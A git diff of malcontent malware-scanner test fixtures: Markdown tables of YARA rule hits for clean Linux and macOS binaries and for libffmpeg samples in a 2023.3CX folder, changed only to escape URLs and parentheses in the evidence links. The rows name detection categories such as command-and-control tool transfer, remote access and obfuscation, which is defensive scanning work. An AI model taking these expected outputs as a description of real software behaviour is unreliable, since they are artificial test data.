[JSONDecode](https://github.com/search?q=JSONDecode&type=code) | | LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSONEncode](https://github.com/search?q=JSONEncode&type=code) | @@ -144,8 +144,8 @@ | LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [Rmdir](https://github.com/search?q=Rmdir&type=code)
[rmdir](https://github.com/search?q=rmdir&type=code) | | LOW | [fs/fifo_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/fifo-create.yara#mkfifo) | make a FIFO special file (a named pipe) | [mkfifo](https://github.com/search?q=mkfifo&type=code) | | LOW | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_force) | Forcibly deletes files | [rm non-TreeNoderserror creating cancelr](https://github.com/search?q=rm+non-TreeNoderserror+creating+cancelr&type=code)
[rm on-chain due to too low of a transa](https://github.com/search?q=rm+on-chain+due+to+too+low+of+a+transa&type=code) | -| LOW | [fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open) | opens files | [open(](https://github.com/search?q=open%28&type=code) | -| LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read) | reads files | [os.(*File).Read](https://github.com/search?q=os.%28%2AFile%29.Read&type=code)
[ReadFile](https://github.com/search?q=ReadFile&type=code) | +| LOW | [fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open) | opens files | [open\(](https://github.com/search?q=open%28&type=code) | +| LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read) | reads files | [os.\(*File\).Read](https://github.com/search?q=os.%28%2AFile%29.Read&type=code)
[ReadFile](https://github.com/search?q=ReadFile&type=code) | | LOW | [fs/file/rename](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-rename.yara#explicit_rename) | renames files | [os.Rename](https://github.com/search?q=os.Rename&type=code)
[os.rename](https://github.com/search?q=os.rename&type=code)
[MoveFile](https://github.com/search?q=MoveFile&type=code) | | LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [writeFilePatchHeader](https://github.com/search?q=writeFilePatchHeader&type=code)
[writeFileToArchive](https://github.com/search?q=writeFileToArchive&type=code)
[writeCacheFile](https://github.com/search?q=writeCacheFile&type=code)
[writeFilestat](https://github.com/search?q=writeFilestat&type=code)
[writeRawFile](https://github.com/search?q=writeRawFile&type=code)
[writerFile](https://github.com/search?q=writerFile&type=code)
[WriteFile](https://github.com/search?q=WriteFile&type=code) | | LOW | [fs/link_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-create.yara#linkat) | May create hard file links | [linkat](https://github.com/search?q=linkat&type=code) | diff --git a/tests/linux/clean/viewgam.md b/tests/linux/clean/viewgam.md index b04f7b7c9..a28978eec 100644 --- a/tests/linux/clean/viewgam.md +++ b/tests/linux/clean/viewgam.md @@ -2,22 +2,22 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |:--|:--|:--|:--| -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code)
[linux](https://github.com/search?q=linux&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[windows](https://github.com/search?q=windows&type=code)
[linux](https://github.com/search?q=linux&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code)
[](https://github.com/search?q=%3Chtml%3E&type=code) | -| MEDIUM | [data/encoding/int](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt_Math) | performs math directly against parsed integers | [+parseInt(](https://github.com/search?q=%2BparseInt%28&type=code) | -| MEDIUM | [data/encoding/utf16](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/utf16.yara#chr) | assembles strings from UTF-16 code units | [(String.fromCharCode.apply(n](https://github.com/search?q=%28String.fromCharCode.apply%28n&type=code)
[=String.fromCharCode(g);a.A=](https://github.com/search?q=%3DString.fromCharCode%28g%29%3Ba.A%3D&type=code)
[=String.fromCharCode(g);a.na](https://github.com/search?q=%3DString.fromCharCode%28g%29%3Ba.na&type=code) | +| MEDIUM | [data/encoding/int](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt_Math) | performs math directly against parsed integers | [+parseInt\(](https://github.com/search?q=%2BparseInt%28&type=code) | +| MEDIUM | [data/encoding/utf16](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/utf16.yara#chr) | assembles strings from UTF-16 code units | [\(String.fromCharCode.apply\(n](https://github.com/search?q=%28String.fromCharCode.apply%28n&type=code)
[=String.fromCharCode\(g\);a.A=](https://github.com/search?q=%3DString.fromCharCode%28g%29%3Ba.A%3D&type=code)
[=String.fromCharCode\(g\);a.na](https://github.com/search?q=%3DString.fromCharCode%28g%29%3Ba.na&type=code) | | MEDIUM | [exec/script/activex](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/script/activex.yara#ActiveXObject) | Create an ActiveX object | [ActiveXObject](https://github.com/search?q=ActiveXObject&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [Download manager stalled](https://github.com/search?q=Download+manager+stalled&type=code)
[internalDownloadCount-](https://github.com/search?q=internalDownloadCount-&type=code)
[var downloadCallbacks](https://github.com/search?q=var+downloadCallbacks&type=code)
[downloadStartTimer](https://github.com/search?q=downloadStartTimer&type=code)
[maxActiveDownloads](https://github.com/search?q=maxActiveDownloads&type=code)
[DownloadManager](https://github.com/search?q=DownloadManager&type=code)
[activeDownloads](https://github.com/search?q=activeDownloads&type=code)
[downloadCount--](https://github.com/search?q=downloadCount--&type=code)
[tryNextDownload](https://github.com/search?q=tryNextDownload&type=code)
[removeDownload](https://github.com/search?q=removeDownload&type=code)
[maxDownloads](https://github.com/search?q=maxDownloads&type=code)
[downloading](https://github.com/search?q=downloading&type=code) | | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [WebSocket](https://github.com/search?q=WebSocket&type=code) | | LOW | [anti-behavior/random_behavior](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random) | uses a random number generator | [currentRandomTextureSize](https://github.com/search?q=currentRandomTextureSize&type=code)
[SSAOrandomTextureSize](https://github.com/search?q=SSAOrandomTextureSize&type=code)
[randomImageBuffer](https://github.com/search?q=randomImageBuffer&type=code)
[randomImageView](https://github.com/search?q=randomImageView&type=code)
[randomTexCoord](https://github.com/search?q=randomTexCoord&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://x3dom.org/x3dom/doc/help/composedShader.html](http://x3dom.org/x3dom/doc/help/composedShader.html)
[http://x3dom.org/docs/latest/configuration.html](http://x3dom.org/docs/latest/configuration.html)
[http://www.x3dom.org/x3dom/src_mobile/x3dom.js](http://www.x3dom.org/x3dom/src_mobile/x3dom.js)
[http://www.web3d.org/x3d/specifications/ISO](http://www.web3d.org/x3d/specifications/ISO)
[http://www.w3.org/1999/XSL/x3dom.Transform](http://www.w3.org/1999/XSL/x3dom.Transform)
[http://examples.x3dom.org/crossdomain.xml](http://examples.x3dom.org/crossdomain.xml)
[http://www.web3d.org/specifications/x3d](http://www.web3d.org/specifications/x3d)
[https://github.com/x3dom/x3dom/tree/](https://github.com/x3dom/x3dom/tree/)
[http://www.w3.org/2001/XMLSchema](http://www.w3.org/2001/XMLSchema)
[http://philip.html5.org/x3d/ext](http://philip.html5.org/x3d/ext)
[http://www.x3dom.org/download/](http://www.x3dom.org/download/)
[http://www.w3.org/1999/xhtml](http://www.w3.org/1999/xhtml) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [http://x3dom.org/x3dom/doc/help/composedShader.html](http%3A%2F%2Fx3dom.org%2Fx3dom%2Fdoc%2Fhelp%2FcomposedShader.html)
[http://x3dom.org/docs/latest/configuration.html](http%3A%2F%2Fx3dom.org%2Fdocs%2Flatest%2Fconfiguration.html)
[http://www.x3dom.org/x3dom/src_mobile/x3dom.js](http%3A%2F%2Fwww.x3dom.org%2Fx3dom%2Fsrc_mobile%2Fx3dom.js)
[http://www.web3d.org/x3d/specifications/ISO](http%3A%2F%2Fwww.web3d.org%2Fx3d%2Fspecifications%2FISO)
[http://www.w3.org/1999/XSL/x3dom.Transform](http%3A%2F%2Fwww.w3.org%2F1999%2FXSL%2Fx3dom.Transform)
[http://examples.x3dom.org/crossdomain.xml](http%3A%2F%2Fexamples.x3dom.org%2Fcrossdomain.xml)
[http://www.web3d.org/specifications/x3d](http%3A%2F%2Fwww.web3d.org%2Fspecifications%2Fx3d)
[https://github.com/x3dom/x3dom/tree/](https%3A%2F%2Fgithub.com%2Fx3dom%2Fx3dom%2Ftree%2F)
[http://www.w3.org/2001/XMLSchema](http%3A%2F%2Fwww.w3.org%2F2001%2FXMLSchema)
[http://philip.html5.org/x3d/ext](http%3A%2F%2Fphilip.html5.org%2Fx3d%2Fext)
[http://www.x3dom.org/download/](http%3A%2F%2Fwww.x3dom.org%2Fdownload%2F)
[http://www.w3.org/1999/xhtml](http%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[x86_64](https://github.com/search?q=x86_64&type=code) | | LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | LOW | [data/encoding/json_decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-decode.yara#jsondecode) | Decodes JSON messages | [JSON.parse](https://github.com/search?q=JSON.parse&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | | LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [InstantPluginATXCtrl](https://github.com/search?q=InstantPluginATXCtrl&type=code)
[plugins](https://github.com/search?q=plugins&type=code) | | LOW | [fs/tempdir/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TEMP.yara#temp) | temp | [getenv](https://github.com/search?q=getenv&type=code)
[temp](https://github.com/search?q=temp&type=code) | | LOW | [net/http](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http) | Uses the HTTP protocol | [http](https://github.com/search?q=http&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://github.com/x3dom/x3dom/tree/](https://github.com/x3dom/x3dom/tree/) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://github.com/x3dom/x3dom/tree/](https%3A%2F%2Fgithub.com%2Fx3dom%2Fx3dom%2Ftree%2F) | | LOW | [os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#getenv) | Retrieve environment variables | [getenv](https://github.com/search?q=getenv&type=code) | diff --git a/tests/linux/clean/zipdetails.md b/tests/linux/clean/zipdetails.md index 91f921143..2560c8555 100644 --- a/tests/linux/clean/zipdetails.md +++ b/tests/linux/clean/zipdetails.md @@ -3,7 +3,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |:--|:--|:--|:--| | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#excessive_hex_refs) | many references to hexadecimal values | [0x02014b50](https://github.com/search?q=0x02014b50&type=code)
[0x04034b50](https://github.com/search?q=0x04034b50&type=code)
[0x05054b50](https://github.com/search?q=0x05054b50&type=code)
[0x06054b50](https://github.com/search?q=0x06054b50&type=code)
[0x06064b50](https://github.com/search?q=0x06064b50&type=code)
[0x07064b50](https://github.com/search?q=0x07064b50&type=code)
[0x08064b50](https://github.com/search?q=0x08064b50&type=code)
[0x08074b50](https://github.com/search?q=0x08074b50&type=code)
[0x10000000](https://github.com/search?q=0x10000000&type=code)
[0x19DB1DED](https://github.com/search?q=0x19DB1DED&type=code)
[0x2146444e](https://github.com/search?q=0x2146444e&type=code)
[0x42726577](https://github.com/search?q=0x42726577&type=code)
[0x504b4453](https://github.com/search?q=0x504b4453&type=code)
[0x6dff800d](https://github.com/search?q=0x6dff800d&type=code)
[0x7109871a](https://github.com/search?q=0x7109871a&type=code)
[0x71777777](https://github.com/search?q=0x71777777&type=code)
[0xE9F3F9F0](https://github.com/search?q=0xE9F3F9F0&type=code)
[0xFFFFFFFF](https://github.com/search?q=0xFFFFFFFF&type=code)
[0xf05368c0](https://github.com/search?q=0xf05368c0&type=code)
[0xff3b5998](https://github.com/search?q=0xff3b5998&type=code)
[0x0001](https://github.com/search?q=0x0001&type=code)
[0x0007](https://github.com/search?q=0x0007&type=code)
[0x0008](https://github.com/search?q=0x0008&type=code)
[0x0009](https://github.com/search?q=0x0009&type=code)
[0x000a](https://github.com/search?q=0x000a&type=code)
[0x000c](https://github.com/search?q=0x000c&type=code)
[0x000d](https://github.com/search?q=0x000d&type=code)
[0x000e](https://github.com/search?q=0x000e&type=code)
[0x000f](https://github.com/search?q=0x000f&type=code)
[0x0014](https://github.com/search?q=0x0014&type=code)
[0x0015](https://github.com/search?q=0x0015&type=code)
[0x0016](https://github.com/search?q=0x0016&type=code)
[0x0017](https://github.com/search?q=0x0017&type=code)
[0x0018](https://github.com/search?q=0x0018&type=code)
[0x0019](https://github.com/search?q=0x0019&type=code)
[0x0020](https://github.com/search?q=0x0020&type=code)
[0x0021](https://github.com/search?q=0x0021&type=code)
[0x0022](https://github.com/search?q=0x0022&type=code)
[0x0023](https://github.com/search?q=0x0023&type=code)
[0x0065](https://github.com/search?q=0x0065&type=code)
[0x0066](https://github.com/search?q=0x0066&type=code)
[0x07c8](https://github.com/search?q=0x07c8&type=code)
[0x2605](https://github.com/search?q=0x2605&type=code)
[0x2705](https://github.com/search?q=0x2705&type=code)
[0x2805](https://github.com/search?q=0x2805&type=code)
[0x334d](https://github.com/search?q=0x334d&type=code)
[0x4154](https://github.com/search?q=0x4154&type=code)
[0x4341](https://github.com/search?q=0x4341&type=code)
[0x4453](https://github.com/search?q=0x4453&type=code)
[0x4690](https://github.com/search?q=0x4690&type=code)
[0x4704](https://github.com/search?q=0x4704&type=code)
[0x470f](https://github.com/search?q=0x470f&type=code)
[0x4854](https://github.com/search?q=0x4854&type=code)
[0x4b46](https://github.com/search?q=0x4b46&type=code)
[0x4c41](https://github.com/search?q=0x4c41&type=code)
[0x4d49](https://github.com/search?q=0x4d49&type=code)
[0x4d63](https://github.com/search?q=0x4d63&type=code)
[0x4f4c](https://github.com/search?q=0x4f4c&type=code)
[0x5356](https://github.com/search?q=0x5356&type=code)
[0x5455](https://github.com/search?q=0x5455&type=code)
[0x554e](https://github.com/search?q=0x554e&type=code)
[0x5855](https://github.com/search?q=0x5855&type=code)
[0x5a4c](https://github.com/search?q=0x5a4c&type=code)
[0x5a4d](https://github.com/search?q=0x5a4d&type=code)
[0x6375](https://github.com/search?q=0x6375&type=code)
[0x6542](https://github.com/search?q=0x6542&type=code)
[0x6854](https://github.com/search?q=0x6854&type=code)
[0x7075](https://github.com/search?q=0x7075&type=code)
[0x7441](https://github.com/search?q=0x7441&type=code)
[0x756e](https://github.com/search?q=0x756e&type=code)
[0x7855](https://github.com/search?q=0x7855&type=code)
[0x7875](https://github.com/search?q=0x7875&type=code)
[0x7FFF](https://github.com/search?q=0x7FFF&type=code)
[0x8000](https://github.com/search?q=0x8000&type=code)
[0x9901](https://github.com/search?q=0x9901&type=code)
[0xA220](https://github.com/search?q=0xA220&type=code)
[0xCAFE](https://github.com/search?q=0xCAFE&type=code)
[0xa11e](https://github.com/search?q=0xa11e&type=code)
[0xfb4a](https://github.com/search?q=0xfb4a&type=code)
[0x01](https://github.com/search?q=0x01&type=code)
[0x03](https://github.com/search?q=0x03&type=code)
[0x0f](https://github.com/search?q=0x0f&type=code)
[0x1f](https://github.com/search?q=0x1f&type=code)
[0x20](https://github.com/search?q=0x20&type=code)
[0x3e](https://github.com/search?q=0x3e&type=code)
[0x3f](https://github.com/search?q=0x3f&type=code)
[0x7f](https://github.com/search?q=0x7f&type=code)
[\x00](https://github.com/search?q=%5Cx00&type=code)
[\x01](https://github.com/search?q=%5Cx01&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[Darwin](https://github.com/search?q=Darwin&type=code)
[linux](https://github.com/search?q=linux&type=code) | +| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https%3A%2F%2F)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http%3A%2F%2F)
[Darwin](https://github.com/search?q=Darwin&type=code)
[linux](https://github.com/search?q=linux&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip files](https://github.com/search?q=zip+files&type=code)
[zipfile](https://github.com/search?q=zipfile&type=code)
[ZIP64](https://github.com/search?q=ZIP64&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | LOW | [anti-behavior/random_behavior](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random) | uses a random number generator | [random](https://github.com/search?q=random&type=code) | @@ -13,5 +13,5 @@ | LOW | [fs/path/usr_bin](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/usr-bin.yara#usr_bin_path) | path reference within /usr/bin | [/usr/bin/perl](https://github.com/search?q=%2Fusr%2Fbin%2Fperl&type=code) | | LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | | LOW | [net/http](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http) | Uses the HTTP protocol | [http](https://github.com/search?q=http&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://android.googlesource.com/platform/tools/apksig/](https://android.googlesource.com/platform/tools/apksig/)
[https://www.winzip.com/win/es/aes_info.html](https://www.winzip.com/win/es/aes_info.html)
[https://github.com/pmqs/zipdetails/issues](https://github.com/pmqs/zipdetails/issues)
[https://www.telerik.com/fiddler](https://www.telerik.com/fiddler) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://android.googlesource.com/platform/tools/apksig/](https%3A%2F%2Fandroid.googlesource.com%2Fplatform%2Ftools%2Fapksig%2F)
[https://www.winzip.com/win/es/aes_info.html](https%3A%2F%2Fwww.winzip.com%2Fwin%2Fes%2Faes_info.html)
[https://github.com/pmqs/zipdetails/issues](https%3A%2F%2Fgithub.com%2Fpmqs%2Fzipdetails%2Fissues)
[https://www.telerik.com/fiddler](https%3A%2F%2Fwww.telerik.com%2Ffiddler) | diff --git a/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff index d57117c0e..26793f1e2 100644 --- a/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff @@ -16,8 +16,8 @@ | -MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [user_agent](https://github.com/search?q=user_agent&type=code) | | -MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | -LOW | [anti-behavior/random_behavior](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random) | uses a random number generator | [_av_aes_ctr_set_random_iv](https://github.com/search?q=_av_aes_ctr_set_random_iv&type=code)
[_av_get_random_seed](https://github.com/search?q=_av_get_random_seed&type=code)
[_arc4random](https://github.com/search?q=_arc4random&type=code)
[randomly](https://github.com/search?q=randomly&type=code) | -| -LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86](https://github.com/search?q=x86&type=code) | -| -LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code) | +| -LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[x86](https://github.com/search?q=x86&type=code) | +| -LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [https://](https%3A%2F%2F)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http%3A%2F%2F)
[windows](https://github.com/search?q=windows&type=code) | | -LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | | -LOW | [crypto/rc4](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_ksa) | RC4 key scheduling algorithm, by Thomas Barabosch | `$cmp_e_x_256`
`$cmp_r_x_256` | | -LOW | [data/compression/zlib](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zlib.yara#zlib) | uses zlib | [zlib](https://github.com/search?q=zlib&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff index ba70585f0..b42a0ec43 100644 --- a/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff @@ -9,8 +9,8 @@ | +MEDIUM | **[impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent)** | references an 'agent' | [user_agent](https://github.com/search?q=user_agent&type=code) | | +MEDIUM | **[net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post)** | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | +LOW | **[anti-behavior/random_behavior](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random)** | uses a random number generator | [_av_aes_ctr_set_random_iv](https://github.com/search?q=_av_aes_ctr_set_random_iv&type=code)
[_av_get_random_seed](https://github.com/search?q=_av_get_random_seed&type=code)
[_arc4random](https://github.com/search?q=_arc4random&type=code)
[randomly](https://github.com/search?q=randomly&type=code) | -| +LOW | **[c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref)** | references a specific architecture | [https://](https://)
[http://](http://)
[x86](https://github.com/search?q=x86&type=code) | -| +LOW | **[c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref)** | references a specific operating system | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code) | +| +LOW | **[c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref)** | references a specific architecture | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[x86](https://github.com/search?q=x86&type=code) | +| +LOW | **[c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref)** | references a specific operating system | [https://](https%3A%2F%2F)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http%3A%2F%2F)
[windows](https://github.com/search?q=windows&type=code) | | +LOW | **[crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes)** | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | | +LOW | **[crypto/rc4](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/rc4.yara#rc4_ksa)** | RC4 key scheduling algorithm, by Thomas Barabosch | `$cmp_e_x_256`
`$cmp_r_x_256` | | +LOW | **[data/compression/zlib](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zlib.yara#zlib)** | uses zlib | [zlib](https://github.com/search?q=zlib&type=code) | diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff index d35661ced..4c37a3cf3 100644 --- a/tests/macOS/clean/ls.mdiff +++ b/tests/macOS/clean/ls.mdiff @@ -12,9 +12,9 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |:--|:--|:--|:--| | -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| -LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[x86](https://github.com/search?q=x86&type=code) | -| -LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [https://](https://)
[linux](https://github.com/search?q=linux&type=code) | +| -LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https%3A%2F%2F)
[x86](https://github.com/search?q=x86&type=code) | +| -LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [https://](https%3A%2F%2F)
[linux](https://github.com/search?q=linux&type=code) | | -LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#lzma) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | | -LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | -| -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/)
[https://translationproject.org/team/](https://translationproject.org/team/)
